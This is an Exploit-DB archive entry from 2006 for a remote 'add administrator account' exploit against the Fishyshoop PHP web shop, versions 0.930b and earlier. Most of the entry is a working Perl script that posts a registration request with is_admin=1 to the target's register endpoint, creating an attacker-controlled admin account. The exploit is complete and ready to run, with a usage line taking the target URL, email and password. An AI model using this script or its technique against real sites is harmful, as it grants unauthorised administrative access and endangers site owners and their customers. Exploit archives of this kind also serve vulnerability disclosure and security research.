Fishyshoop <= 0.930b Remote Add Administrator Account Exploit

2006-12-25T00:00:00
ID EDB-ID:3011
Type exploitdb
Reporter James Gray
Modified 2006-12-25T00:00:00

Description

Fishyshoop <= 0.930b Remote Add Administrator Account Exploit. Webapps exploit for php platform

                                        
                                            #!/usr/bin/perl
# James Gray &lt;james6.0[@]gmail.com&gt;
# Fishyshoop Security Vulnerability

use WWW::Curl::Easy;

sub usage() {
 print "$0 &lt;Fishyshoop root URL&gt; &lt;Desired E-Mail&gt; &lt;Desired Password&gt;\n";
 exit();
}

$FSURL=shift or usage(); $UNAME=shift or usage(); $PASS=shift or usage();

my $fishyshoop = new WWW::Curl::Easy;
$fishyshoop-&gt;setopt(CURLOPT_URL, "$FSURL?L=register.register");
$fishyshoop-&gt;setopt(CURLOPT_POST, 1);
$fishyshoop-&gt;setopt(CURLOPT_POSTFIELDS, "email=$UNAME&password=$PASS&is_admin=1&submit=1");
$fishyshoop-&gt;perform;

# milw0rm.com [2006-12-25]